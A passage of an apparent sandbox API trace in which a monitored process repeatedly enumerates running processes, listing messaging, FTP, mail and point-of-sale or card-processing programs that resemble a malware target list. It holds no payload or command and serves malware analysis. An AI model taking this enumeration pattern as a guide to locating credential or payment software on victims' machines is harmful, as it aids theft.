th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0249.287] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0249.289] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0249.291] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0249.293] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0249.298] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0249.299] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0249.301] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0249.303] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0249.305] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0249.308] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0249.313] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0249.315] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0249.316] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0249.318] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0249.320] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0249.322] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0249.323] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0249.375] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0249.377] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0249.379] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0249.380] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0249.382] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0249.383] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0249.385] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0249.386] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0249.391] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0249.392] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0249.394] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.395] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.397] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.398] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.400] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.401] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0249.406] CloseHandle (hObject=0x758) returned 1 [0249.406] Sleep (dwMilliseconds=0x64) [0249.534] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0249.554] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.556] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.563] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.565] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.568] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.570] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.572] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.595] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.598] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.600] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.602] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.604] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.609] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.611] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.613] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.616] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.618] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.620] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.672] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.674] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.676] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0249.678] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0249.680] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.682] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.725] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0249.727] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0249.729] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0249.735] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.737] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0249.739] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0249.741] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.743] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.745] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0249.750] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0249.752] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0249.754] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0249.756] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0249.759] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0249.761] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0249.814] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0249.816] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0249.817] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0249.819] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0249.820] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0249.821] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0249.823] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0249.827] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0249.828] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0249.830] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0249.831] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 